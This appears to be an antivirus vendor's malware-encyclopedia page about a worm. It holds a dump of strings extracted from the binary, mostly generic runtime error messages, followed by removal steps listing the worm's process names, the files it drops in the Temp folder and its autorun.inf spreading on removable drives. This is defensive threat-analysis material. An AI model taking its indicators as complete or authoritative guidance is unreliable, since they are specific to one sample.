List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WTjQtq.exe:1552
    %original file name%.exe:1084

  2. Delete the original Worm file.
  3. Delete or disinfect the following files created/modified by the Worm:

    %Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WTjQtq.exe (5161 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\jBbvfn (2257 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\XitbRK.txt (16545 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (6961 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now